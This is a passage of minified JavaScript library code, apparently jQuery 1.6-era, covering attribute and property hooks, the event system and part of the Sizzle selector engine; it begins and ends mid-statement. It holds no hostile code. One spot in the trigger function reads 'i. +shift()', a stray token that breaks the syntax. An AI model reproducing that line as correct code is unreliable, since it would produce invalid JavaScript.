");for(i=0,j=c.length;i<j;i++)h=h.replace(" "+c[i]+" "," ");g.className=f.trim(h)}else g.className=""}}return this},toggleClass:function(a,b){var c=typeof a,d=typeof b=="boolean";if(f.isFunction(a))return this.each(function(c){f(this).toggleClass(a.call(this,c,this.className,b),b)});return this.each(function(){if(c==="string"){var e,g=0,h=f(this),i=b,j=a.split(o);while(e=j[g++])i=d?i:!h.hasClass(e),h[i?"addClass":"removeClass"](e)}else if(c==="undefined"||c==="boolean")this.className&&f._data(this,"__className__",this.className),this.className=this.className||a===!1?"":f._data(this,"__className__")||""})},hasClass:function(a){var b=" "+a+" ";for(var c=0,d=this.length;c<d;c++)if((" "+this[c].className+" ").replace(n," ").indexOf(b)>-1)return!0;return!1},val:function(a){var c,d,e=this[0];if(!arguments.length){if(e){c=f.valHooks[e.nodeName.toLowerCase()]||f.valHooks[e.type];if(c&&"get"in c&&(d=c.get(e,"value"))!==b)return d;d=e.value;return typeof d=="string"?d.replace(p,""):d==null?"":d}return b}var g=f.isFunction(a);return this.each(function(d){var e=f(this),h;if(this.nodeType===1){g?h=a.call(this,d,e.val()):h=a,h==null?h="":typeof h=="number"?h+="":f.isArray(h)&&(h=f.map(h,function(a){return a==null?"":a+""})),c=f.valHooks[this.nodeName.toLowerCase()]||f.valHooks[this.type];if(!c||!("set"in c)||c.set(this,h,"value")===b)this.value=h}})}}),f.extend({valHooks:{option:{get:function(a){var b=a.attributes.value;return!b||b.specified?a.value:a.text}},select:{get:function(a){var b,c=a.selectedIndex,d=[],e=a.options,g=a.type==="select-one";if(c<0)return null;for(var h=g?c:0,i=g?c+1:e.length;h<i;h++){var j=e[h];if(j.selected&&(f.support.optDisabled?!j.disabled:j.getAttribute("disabled")===null)&&(!j.parentNode.disabled||!f.nodeName(j.parentNode,"optgroup"))){b=f(j).val();if(g)return b;d.push(b)}}if(g&&!d.length&&e.length)return f(e[c]).val();return d},set:function(a,b){var c=f.makeArray(b);f(a).find("option").each(function(){this.selected=f.inArray(f(this).val(),c)>=0}),c.length||(a.selectedIndex=-1);return c}}},attrFn:{val:!0,css:!0,html:!0,text:!0,data:!0,width:!0,height:!0,offset:!0},attrFix:{tabindex:"tabIndex"},attr:function(a,c,d,e){var g=a.nodeType;if(!a||g===3||g===8||g===2)return b;if(e&&c in f.attrFn)return f(a)[c](d);if(!("getAttribute"in a))return f.prop(a,c,d);var h,i,j=g!==1||!f.isXMLDoc(a);j&&(c=f.attrFix[c]||c,i=f.attrHooks[c],i||(t.test(c)?i=w:v&&c!=="className"&&(f.nodeName(a,"form")||u.test(c))&&(i=v)));if(d!==b){if(d===null){f.removeAttr(a,c);return b}if(i&&"set"in i&&j&&(h=i.set(a,d,c))!==b)return h;a.setAttribute(c,""+d);return d}if(i&&"get"in i&&j&&(h=i.get(a,c))!==null)return h;h=a.getAttribute(c);return h===null?b:h},removeAttr:function(a,b){var c;a.nodeType===1&&(b=f.attrFix[b]||b,f.support.getSetAttribute?a.removeAttribute(b):(f.attr(a,b,""),a.removeAttributeNode(a.getAttributeNode(b))),t.test(b)&&(c=f.propFix[b]||b)in a&&(a[c]=!1))},attrHooks:{type:{set:function(a,b){if(q.test(a.nodeName)&&a.parentNode)f.error("type property can't be changed");else if(!f.support.radioValue&&b==="radio"&&f.nodeName(a,"input")){var c=a.value;a.setAttribute("type",b),c&&(a.value=c);return b}}},tabIndex:{get:function(a){var c=a.getAttributeNode("tabIndex");return c&&c.specified?parseInt(c.value,10):r.test(a.nodeName)||s.test(a.nodeName)&&a.href?0:b}},value:{get:function(a,b){if(v&&f.nodeName(a,"button"))return v.get(a,b);return b in a?a.value:null},set:function(a,b,c){if(v&&f.nodeName(a,"button"))return v.set(a,b,c);a.value=b}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(a,c,d){var e=a.nodeType;if(!a||e===3||e===8||e===2)return b;var g,h,i=e!==1||!f.isXMLDoc(a);i&&(c=f.propFix[c]||c,h=f.propHooks[c]);return d!==b?h&&"set"in h&&(g=h.set(a,d,c))!==b?g:a[c]=d:h&&"get"in h&&(g=h.get(a,c))!==b?g:a[c]},propHooks:{}}),w={get:function(a,c){return f.prop(a,c)?c.toLowerCase():b},set:function(a,b,c){var d;b===!1?f.removeAttr(a,c):(d=f.propFix[c]||c,d in a&&(a[d]=!0),a.setAttribute(c,c.toLowerCase()));return c}},f.support.getSetAttribute||(f.attrFix=f.propFix,v=f.attrHooks.name=f.attrHooks.title=f.valHooks.button={get:function(a,c){var d;d=a.getAttributeNode(c);return d&&d.nodeValue!==""?d.nodeValue:b},set:function(a,b,c){var d=a.getAttributeNode(c);if(d){d.nodeValue=b;return b}}},f.each(["width","height"],function(a,b){f.attrHooks[b]=f.extend(f.attrHooks[b],{set:function(a,c){if(c===""){a.setAttribute(b,"auto");return c}}})})),f.support.hrefNormalized||f.each(["href","src","width","height"],function(a,c){f.attrHooks[c]=f.extend(f.attrHooks[c],{get:function(a){var d=a.getAttribute(c,2);return d===null?b:d}})}),f.support.style||(f.attrHooks.style={get:function(a){return a.style.cssText.toLowerCase()||b},set:function(a,b){return a.style.cssText=""+b}}),f.support.optSelected||(f.propHooks.selected=f.extend(f.propHooks.selected,{get:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}})),f.support.checkOn||f.each(["radio","checkbox"],function(){f.valHooks[this]={get:function(a){return a.getAttribute("value")===null?"on":a.value}}}),f.each(["radio","checkbox"],function(){f.valHooks[this]=f.extend(f.valHooks[this],{set:function(a,b){if(f.isArray(b))return a.checked=f.inArray(f(a).val(),b)>=0}})});var x=/\.(.*)$/,y=/^(?:textarea|input|select)$/i,z=/\./g,A=/ /g,B=/[^\w\s.|`]/g,C=function(a){return a.replace(B,"\\$&")};f.event={add:function(a,c,d,e){if(a.nodeType!==3&&a.nodeType!==8){if(d===!1)d=D;else if(!d)return;var g,h;d.handler&&(g=d,d=g.handler),d.guid||(d.guid=f.guid++);var i=f._data(a);if(!i)return;var j=i.events,k=i.handle;j||(i.events=j={}),k||(i.handle=k=function(a){return typeof f!="undefined"&&(!a||f.event.triggered!==a.type)?f.event.handle.apply(k.elem,arguments):b}),k.elem=a,c=c.split(" ");var l,m=0,n;while(l=c[m++]){h=g?f.extend({},g):{handler:d,data:e},l.indexOf(".")>-1?(n=l.split("."),l=n.shift(),h.namespace=n.slice(0).sort().join(".")):(n=[],h.namespace=""),h.type=l,h.guid||(h.guid=d.guid);var o=j[l],p=f.event.special[l]||{};if(!o){o=j[l]=[];if(!p.setup||p.setup.call(a,e,n,k)===!1)a.addEventListener?a.addEventListener(l,k,!1):a.attachEvent&&a.attachEvent("on"+l,k)}p.add&&(p.add.call(a,h),h.handler.guid||(h.handler.guid=d.guid)),o.push(h),f.event.global[l]=!0}a=null}},global:{},remove:function(a,c,d,e){if(a.nodeType!==3&&a.nodeType!==8){d===!1&&(d=D);var g,h,i,j,k=0,l,m,n,o,p,q,r,s=f.hasData(a)&&f._data(a),t=s&&s.events;if(!s||!t)return;c&&c.type&&(d=c.handler,c=c.type);if(!c||typeof c=="string"&&c.charAt(0)==="."){c=c||"";for(h in t)f.event.remove(a,h+c);return}c=c.split(" ");while(h=c[k++]){r=h,q=null,l=h.indexOf(".")<0,m=[],l||(m=h.split("."),h=m.shift(),n=new RegExp("(^|\\.)"+f.map(m.slice(0).sort(),C).join("\\.(?:.*\\.)?")+"(\\.|$)")),p=t[h];if(!p)continue;if(!d){for(j=0;j<p.length;j++){q=p[j];if(l||n.test(q.namespace))f.event.remove(a,r,q.handler,j),p.splice(j--,1)}continue}o=f.event.special[h]||{};for(j=e||0;j<p.length;j++){q=p[j];if(d.guid===q.guid){if(l||n.test(q.namespace))e==null&&p.splice(j--,1),o.remove&&o.remove.call(a,q);if(e!=null)break}}if(p.length===0||e!=null&&p.length===1)(!o.teardown||o.teardown.call(a,m)===!1)&&f.removeEvent(a,h,s.handle),g=null,delete t[h]}if(f.isEmptyObject(t)){var u=s.handle;u&&(u.elem=null),delete s.events,delete s.handle,f.isEmptyObject(s)&&f.removeData(a,b,!0)}}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){var h=c.type||c,i=[],j;h.indexOf("!")>=0&&(h=h.slice(0,-1),j=!0),h.indexOf(".")>=0&&(i=h.split("."),h=i. +shift(),i.sort());if(!!e&&!f.event.customEvent[h]||!!f.event.global[h]){c=typeof c=="object"?c[f.expando]?c:new f.Event(h,c):new f.Event(h),c.type=h,c.exclusive=j,c.namespace=i.join("."),c.namespace_re=new RegExp("(^|\\.)"+i.join("\\.(?:.*\\.)?")+"(\\.|$)");if(g||!e)c.preventDefault(),c.stopPropagation();if(!e){f.each(f.cache,function(){var a=f.expando,b=this[a];b&&b.events&&b.events[h]&&f.event.trigger(c,d,b.handle.elem)});return}if(e.nodeType===3||e.nodeType===8)return;c.result=b,c.target=e,d=d!=null?f.makeArray(d):[],d.unshift(c);var k=e,l=h.indexOf(":")<0?"on"+h:"";do{var m=f._data(k,"handle");c.currentTarget=k,m&&m.apply(k,d),l&&f.acceptData(k)&&k[l]&&k[l].apply(k,d)===!1&&(c.result=!1,c.preventDefault()),k=k.parentNode||k.ownerDocument||k===c.target.ownerDocument&&a}while(k&&!c.isPropagationStopped());if(!c.isDefaultPrevented()){var n,o=f.event.special[h]||{};if((!o._default||o._default.call(e.ownerDocument,c)===!1)&&(h!=="click"||!f.nodeName(e,"a"))&&f.acceptData(e)){try{l&&e[h]&&(n=e[l],n&&(e[l]=null),f.event.triggered=h,e[h]())}catch(p){}n&&(e[l]=n),f.event.triggered=b}}return c.result}},handle:function(c){c=f.event.fix(c||a.event);var d=((f._data(this,"events")||{})[c.type]||[]).slice(0),e=!c.exclusive&&!c.namespace,g=Array.prototype.slice.call(arguments,0);g[0]=c,c.currentTarget=this;for(var h=0,i=d.length;h<i;h++){var j=d[h];if(e||c.namespace_re.test(j.namespace)){c.handler=j.handler,c.data=j.data,c.handleObj=j;var k=j.handler.apply(this,g);k!==b&&(c.result=k,k===!1&&(c.preventDefault(),c.stopPropagation()));if(c.isImmediatePropagationStopped())break}}return c.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(a){if(a[f.expando])return a;var d=a;a=f.Event(d);for(var e=this.props.length,g;e;)g=this.props[--e],a[g]=d[g];a.target||(a.target=a.srcElement||c),a.target.nodeType===3&&(a.target=a.target.parentNode),!a.relatedTarget&&a.fromElement&&(a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement);if(a.pageX==null&&a.clientX!=null){var h=a.target.ownerDocument||c,i=h.documentElement,j=h.body;a.pageX=a.clientX+(i&&i.scrollLeft||j&&j.scrollLeft||0)-(i&&i.clientLeft||j&&j.clientLeft||0),a.pageY=a.clientY+(i&&i.scrollTop||j&&j.scrollTop||0)-(i&&i.clientTop||j&&j.clientTop||0)}a.which==null&&(a.charCode!=null||a.keyCode!=null)&&(a.which=a.charCode!=null?a.charCode:a.keyCode),!a.metaKey&&a.ctrlKey&&(a.metaKey=a.ctrlKey),!a.which&&a.button!==b&&(a.which=a.button&1?1:a.button&2?3:a.button&4?2:0);return a},guid:1e8,proxy:f.proxy,special:{ready:{setup:f.bindReady,teardown:f.noop},live:{add:function(a){f.event.add(this,N(a.origType,a.selector),f.extend({},a,{handler:M,guid:a.handler.guid}))},remove:function(a){f.event.remove(this,N(a.origType,a.selector),a)}},beforeunload:{setup:function(a,b,c){f.isWindow(this)&&(this.onbeforeunload=c)},teardown:function(a,b){this.onbeforeunload===b&&(this.onbeforeunload=null)}}}},f.removeEvent=c.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){a.detachEvent&&a.detachEvent("on"+b,c)},f.Event=function(a,b){if(!this.preventDefault)return new f.Event(a,b);a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault()?E:D):this.type=a,b&&f.extend(this,b),this.timeStamp=f.now(),this[f.expando]=!0},f.Event.prototype={preventDefault:function(){this.isDefaultPrevented=E;var a=this.originalEvent;!a||(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){this.isPropagationStopped=E;var a=this.originalEvent;!a||(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=E,this.stopPropagation()},isDefaultPrevented:D,isPropagationStopped:D,isImmediatePropagationStopped:D};var F=function(a){var b=a.relatedTarget,c=!1,d=a.type;a.type=a.data,b!==this&&(b&&(c=f.contains(this,b)),c||(f.event.handle.apply(this,arguments),a.type=d))},G=function(a){a.type=a.data,f.event.handle.apply(this,arguments)};f.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){f.event.special[a]={setup:function(c){f.event.add(this,b,c&&c.selector?G:F,a)},teardown:function(a){f.event.remove(this,b,a&&a.selector?G:F)}}}),f.support.submitBubbles||(f.event.special.submit={setup:function(a,b){if(!f.nodeName(this,"form"))f.event.add(this,"click.specialSubmit",function(a){var b=a.target,c=b.type;(c==="submit"||c==="image")&&f(b).closest("form").length&&K("submit",this,arguments)}),f.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,c=b.type;(c==="text"||c==="password")&&f(b).closest("form").length&&a.keyCode===13&&K("submit",this,arguments)});else return!1},teardown:function(a){f.event.remove(this,".specialSubmit")}});if(!f.support.changeBubbles){var H,I=function(a){var b=a.type,c=a.value;b==="radio"||b==="checkbox"?c=a.checked:b==="select-multiple"?c=a.selectedIndex>-1?f.map(a.options,function(a){return a.selected}).join("-"):"":f.nodeName(a,"select")&&(c=a.selectedIndex);return c},J=function(c){var d=c.target,e,g;if(!!y.test(d.nodeName)&&!d.readOnly){e=f._data(d,"_change_data"),g=I(d),(c.type!=="focusout"||d.type!=="radio")&&f._data(d,"_change_data",g);if(e===b||g===e)return;if(e!=null||g)c.type="change",c.liveFired=b,f.event.trigger(c,arguments[1],d)}};f.event.special.change={filters:{focusout:J,beforedeactivate:J,click:function(a){var b=a.target,c=f.nodeName(b,"input")?b.type:"";(c==="radio"||c==="checkbox"||f.nodeName(b,"select"))&&J.call(this,a)},keydown:function(a){var b=a.target,c=f.nodeName(b,"input")?b.type:"";(a.keyCode===13&&!f.nodeName(b,"textarea")||a.keyCode===32&&(c==="checkbox"||c==="radio")||c==="select-multiple")&&J.call(this,a)},beforeactivate:function(a){var b=a.target;f._data(b,"_change_data",I(b))}},setup:function(a,b){if(this.type==="file")return!1;for(var c in H)f.event.add(this,c+".specialChange",H[c]);return y.test(this.nodeName)},teardown:function(a){f.event.remove(this,".specialChange");return y.test(this.nodeName)}},H=f.event.special.change.filters,H.focus=H.beforeactivate}f.support.focusinBubbles||f.each({focus:"focusin",blur:"focusout"},function(a,b){function e(a){var c=f.event.fix(a);c.type=b,c.originalEvent={},f.event.trigger(c,null,c.target),c.isDefaultPrevented()&&a.preventDefault()}var d=0;f.event.special[b]={setup:function(){d++===0&&c.addEventListener(a,e,!0)},teardown:function(){--d===0&&c.removeEventListener(a,e,!0)}}}),f.each(["bind","one"],function(a,c){f.fn[c]=function(a,d,e){var g;if(typeof a=="object"){for(var h in a)this[c](h,d,a[h],e);return this}if(arguments.length===2||d===!1)e=d,d=b;c==="one"?(g=function(a){f(this).unbind(a,g);return e.apply(this,arguments)},g.guid=e.guid||f.guid++):g=e;if(a==="unload"&&c!=="one")this.one(a,d,e);else for(var i=0,j=this.length;i<j;i++)f.event.add(this[i],a,g,d);return this}}),f.fn.extend({unbind:function(a,b){if(typeof a=="object"&&!a.preventDefault)for(var c in a)this.unbind(c,a[c]);else for(var d=0,e=this.length;d<e;d++)f.event.remove(this[d],a,b);return this},delegate:function(a,b,c,d){return this.live(b,c,d,a)},undelegate:function(a,b,c){return arguments.length===0?this.unbind("live"):this.die(b,null,c,a)},trigger:function(a,b){return this.each(function(){f.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0])return f.event.trigger(a,b,this[0],!0)},toggle:function(a){var b=arguments,c=a.guid||f.guid++,d=0,e=function(c){var e=(f.data(this,"lastToggle"+a.guid)||0)%d;f.data(this,"lastToggle"+a.guid,e+1),c.preventDefault();return b[e].apply(this,arguments)||!1};e.guid=c;while(d<b.length)b[d++].guid=c;return this.click(e)},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var L={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};f.each(["live","die"],function(a,c){f.fn[c]=function(a,d,e,g){var h,i=0,j,k,l,m=g||this.selector,n=g?this:f(this.context);if(typeof a=="object"&&!a.preventDefault){for(var o in a)n[c](o,d,a[o],m);return this}if(c==="die"&&!a&&g&&g.charAt(0)==="."){n.unbind(g);return this}if(d===!1||f.isFunction(d))e=d||D,d=b;a=(a||"").split(" ");while((h=a[i++])!=null){j=x.exec(h),k="",j&&(k=j[0],h=h.replace(x,""));if(h==="hover"){a.push("mouseenter"+k,"mouseleave"+k);continue}l=h,L[h]?(a.push(L[h]+k),h=h+k):h=(L[h]||h)+k;if(c==="live")for(var p=0,q=n.length;p<q;p++)f.event.add(n[p],"live."+N(h,m),{data:d,selector:m,handler:e,origType:h,origHandler:e,preType:l});else n.unbind("live."+N(h,m),e)}return this}}),f.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),function(a,b){f.fn[b]=function(a,c){c==null&&(c=a,a=null);return arguments.length>0?this.bind(b,a,c):this.trigger(b)},f.attrFn&&(f.attrFn[b]=!0)}),function(){function u(a,b,c,d,e,f){for(var g=0,h=d.length;g<h;g++){var i=d[g];if(i){var j=!1;i=i[a];while(i){if(i.sizcache===c){j=d[i.sizset];break}if(i.nodeType===1){f||(i.sizcache=c,i.sizset=g);if(typeof b!="string"){if(i===b){j=!0;break}}else if(k.filter(b,[i]).length>0){j=i;break}}i=i[a]}d[g]=j}}}function t(a,b,c,d,e,f){for(var g=0,h=d.length;g<h;g++){var i=d[g];if(i){var j=!1;i=i[a];while(i){if(i.sizcache===c){j=d[i.sizset];break}i.nodeType===1&&!f&&(i.sizcache=c,i.sizset=g);if(i.nodeName.toLowerCase()===b){j=i;break}i=i[a]}d[g]=j}}}var a=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^\[\]]*\]|['"][^'"]*['"]|[^\[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,d=0,e=Object.prototype.toString,g=!1,h=!0,i=/\\/g,j=/\W/;[0,0].sort(function(){h=!1;return 0});var k=function(b,d,f,g){f=f||[],d=d||c;var h=d;if(d.nodeType!==1&&d.nodeType!==9)return[];if(!b||typeof b!="string")return f;var i,j,n,o,q,r,s,t,u=!0,w=k.isXML(d),x=[],y=b;do{a.exec(""),i=a.exec(y);if(i){y=i[3],x.push(i[1]);if(i[2]){o=i[3];break}}}while(i);if(x.length>1&&m.exec(b))if(x.length===2&&l.relative[x[0]])j=v(x[0]+x[1],d);else{j=l.relative[x[0]]?[d]:k(x.shift(),d);while(x.length)b=x.shift(),l.relative[b]&&(b+=x.shift()),j=v(b,j)}else{!g&&x.length>1&&d.nodeType===9&&!w&&l.match.ID.test(x[0])&&!l.match.ID.test(x[x.length-1])&&(q=k.find(x.shift(),d,w),d=q.expr?k.filter(q.expr,q.set)[0]:q.set[0]);if(d){q=g?{expr:x.pop(),set:p(g)}:k.find(x.pop(),x.length===1&&(x[0]==="~"||x[0]==="+")&&d.parentNode?d.parentNode:d,w),j=q.expr?k.filter(q.expr,q.set):q.set,x.length>0?n=p(j):u=!1;while(x.length)r=x.pop(),s=r,l.relative[r]?s=x.pop():r="",s==null&&(s=d),l.relative[r](n,s,w)}else n=x=[]}n||(n=j),n||k.error(r||b);if(e.call(n)==="[object Array]")if(!u)f.push.apply(f,n);else if(d&&d.nodeType===1)for(t=0;n[t]!=null;t++)n[t]&&(n[t]===!0||n[t].nodeType===1&&k.contains(d,n[t]))&&f.push(j[t]);else for(t=0;n[t]!=null;t++)n[t]&&n[t].nodeType===1&&f.push(j[t]);else p(n,f);o&&(k(o,h,f,g),k.uniqueSort(f));return f};k.uniqueSort=function(a){if(r){g=h,a.sort(r);if(g)for(var b=1;b<a.length;b++)a[b]===a[b-1]&&a.splice(b--,1)}return a},k.matches=function(a,b){return k(a,null,null,b)},k.matchesSelector=function(a,b){return k(b,null,null,[a]).length>0},k.find=function(a,b,c){var d;if(!a)return[];for(var e=0,f=l.order.length;e<f;e++){var g,h=l.order[e];if(g=l.leftMatch[h].exec(a)){var j=g[1];g.splice(1,1);if(j.substr(j.length-1)!=="\\"){g[1]=(g[1]||"").replace(i,""),d=l.find[h](g,b,c);if(d!=null){a=a.replace(l.match[h],"");break}}}}d||(d=typeof b.getElementsByTagName!="undefined"?b.getElementsByTagName("*"):[]);return{set:d,expr:a}},k.filter=function(a,c,d,e){var f,g,h=a,i=[],j=c,m=c&&c[0]&&k.isXML(c[0]);while(a&&c.length){for(var n in l.filter)if((f=l.leftMatch[n].exec(a))!=null&&f[2]){var o,p,q=l.filter[n],r=f[1];g=!1,f.splice(1,1);if(r.substr(r.length-1)==="\\")continue;j===i&&(i=[]);if(l.preFilter[n]){f=l.preFilter[n](f,j,d,i,e,m);if(!f)g=o=!0;else if(f===!0)continue}if(f)for(var s=0;(p=j[s])!=null;s++)if(p){o=q(p,f,s,j);var t=e^!!o;d&&o!=null?t?g=!0:j[s]=!1:t&&(i.push(p),g=!0)}if(o!==b){d||(j=i),a=a.replace(l.match[n],"");if(!g)return[];break}}if(a===h)if(g==null)k.error(a);else break;h=a}return j},k.error=function(a){throw"Syntax error, unrecognized expression: "+a};var l=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(a){return a.getAttribute("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!j.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e||h&&h.nodeName.toLowerCase()===b?h||!1:h===b}e&&k.filter(b,a,!0)},">":function(a,b){var c,d=typeof b=="string",e=0,f=a.length;if(d&&!j.test(b)){b=b.toLowerCase();for(;e<f;e++){c=a[e];if(c){var g=c.parentNode;a[e]=g.nodeName.toLowerCase()===b?g:!1}}}else{for(;e<f;e++)c=a[e],c&&(a[e]=d?c.parentNode:c.parentNode===b);d&&k.filter(b,a,!0)}},"":function(a,b,c){var e,f=d++,g=u;typeof b=="string"&&!j.test(b)&&(b=b.toLowerCase(),e=b,g=t),g("parentNode",b,f,a,e,c)},"~":function(a,b,c){var e,f=d++,g=u;typeof b=="string"&&!j.test(b)&&(b=b.toLowerCase(),e=b,g=t),g("previousSibling",b,f,a,e,c)}},find:{ID:function(a,b,c){if(typeof b.getElementById!="undefined"&&!c){var d=b.getElementById(a[1]);return d&&d.parentNode?[d]:[]}},NAME:function(a,b){if(typeof b.getElementsByName!="undefined"){var c=[],d=b.getElementsByName(a[1]);for(var e=0,f=d.length;e<f;e++)d[e].getAttribute("name")===a[1]&&c.push(d[e]);return c.length===0?null:c}},TAG:function(a,b){if(typeof b.getElementsByTagName!="undefined")return b.getElementsByTagName(a[1])}},preFilter:{CLASS:function(a,b,c,d,e,f){a=" "+a[1].replace(i,"")+" ";if(f)return a;for(var g=0,h;(h=b[g])!=null;g++)h&&(e^(h.className&&(" "+h.className+" ").replace(/[\t\n\r]/g," ").indexOf(a)>=0)?c||d.push(h):c&&(b[g]=!1));return!1},ID:function(a){return a[1].replace(i,"")},TAG:function(a,b){return a[1].replace(i,"").toLowerCase()},CHILD:function(a){if(a[1]==="nth"){a[2]||k.error(a[0]),a[2]=a[2].replace(/^\+|\s*/g,"");var b=/(-?)(\d*)(?:n([+\-]?\d*))?/.exec(a[2]==="even"&&"2n"||a[2]==="odd"&&"2n+1"||!/\D/.test(a[2])&&"0n+"+a[2]||a[2]);a[2]=b[1]+(b[2]||1)-0,a[3]=b[3]-0}else a[2]&&k.error(a[0]);a[0]=d++;return a},ATTR:function(a,b,c,d,e,f){var g=a[1]=a[1].replace(i,"");!f&&l.attrMap[g]&&(a[1]=l.attrMap[g]),a[4]=(a[4]||a[5]||"").replace(i,""),a[2]==="~="&&(a[4]=" "+a[4]+" ");return a},PSEUDO:function(b,c,d,e,f){if(b[1]==="not")if((a.exec(b[3])||"").length>1||/^\w/.test(b[3]))b[3]=k(b[3],null,null,c);else{var g=k.filter(b[3],c,d,!0^f);d||e.push.apply(e,g);return!1}else if(l.match.POS.test(b[0])||l.match.CHILD.test(b[0]))return!0;return b},POS:function(a){a.unshift(!0);return a}},filters:{enabled:function(a){return a.disabled===!1&&a.type!=="hidden"},disabled:function(a){return a.disabled===!0},checked:function(a){return a.checked===!0},selected:function(a){a.parentNode&&a.parentNode.selectedIndex;return a.selected===!0},parent:function(a){return!!a.firstChild},empty:function(a){return!a.firstChild},has:function(a,b,c){return!!k(c[3],a).length},header:function(a){return/h\d/i.test(a.nodeName)},text:function(a){var b=a.getAttribute("type"),c=a.type;return a.nodeName.toLowerCase()==="input"&&"text"===c&&(b===c||b===null)},radio:function(a){return a.nodeName.toLowerCase()==="input"&&"radio"===a.type},checkbox:function(a){return a.nodeName.toLowerCase()==="input"&&"checkbox"===a.type},file:function(a){return a.nodeName.toLowerCase()==="input"&&"file"===a.type},password:function(a){return a.nodeName.toLowerCase()==="input"&&"password"===a.type},submit:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"submit"===a.type},image:function(a){return a.nodeName.toLowerCase()==="input"&&"image"===a.type},reset:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"reset"===a.type},button:function(a){var b=a.nodeName.toLowerCase();return b==="input"&&"button"===a.type||b==="button"},input:function(a){return/input|select|textarea|button/i.test(a.nodeName)},focus:function(a){return a===a.ownerDocument.activeElement}},setFilters:{first:function(a,b){return b===0},last:function(a,b,c,d){return b===d.length-1},even:function(a,b){return b%2===0},odd:function(a,b){return b%2===1},lt:function(a,b,c){return b<c[3]-0},gt:function(a,b,c){return b>c[3]-0},nth:function(a,b,c){return c[3]-0===b},eq:function(a,b,c){return c[3]-0===b}},filter:{PSEUDO:function(a,b,c,d){var e=b[1],f=l.filters[e];if(f)return f(a,c,b,d);if(e==="contains")return(a.textContent||a.innerText||k.getText([a])||"").indexOf(b[3])>=0;if(e==="not"){var g=b[3];for(var h=0,i=g.length;h<i;h++)if(g[h]===a)return!1;return!0}k.error(e)},CHILD:function(a,b){var c=b[1],d=a;switch(c){case"only":case"first":while(d=d.previousSibling)if(d.nodeType===1)return!1;if(c==="first")return!0;d=a;case"last":while(d=d.nextSibling)if(d.nodeType===1)return!1;return!0;case"nth":var e=b[2],f=b[3];if(e===1&&f===0)return!0;var g=b[0],h=a.parentNode;if(h&&(h.sizcache!==g||!a.nodeIndex)){var i=0;for(d=h.firstChild;d;d=d.nextSibling)d.nodeType===1&&(d.nodeIndex=++i);h.sizcache=g}var j=a.nodeIndex-f;return e===0?j===0:j%e===0&&j/e>=0}},ID:function(a,b){return a.nodeType===1&&a.getAttribute("id")===b},TAG:function(a,b){return b==="*"&&a.nodeType===1||a.nodeName.toLowerCase()===b},CLASS:function(a,b){return(" "+(a.className||a.getAttribute("class"))+" ").indexOf(b)>-1},ATTR:function(a,b){var c=b[1],d=l.attrHandle[c]?l.attrHandle[c](a):a[c]!=null?a[c]:a.getAttribute(c),e=d+"",f=b[2],g=b[4];return d==null?f==="!=":f==="="?e===g:f==="*="?e.indexOf(g)>=0:f==="~="?(" "+e+" ").indexOf(g)>=0:g?f==="!="?e!==g:f==="^="?e.indexOf(g)===0:f==="$="?e.substr(e.length-g.length)===g:f==="|="?e===g||e.substr(0,g.length+1)===g+"-":!1:e&&d!==!1},POS:function(a,b,c,d){var e=b[2],f=l.setFilters[e];if(f)return f(a,c,b,d)}}},m=l.match.POS,n=function(a,b){return"\\"+(b-0+1)};for(var o in l.match)l.match[o]=new 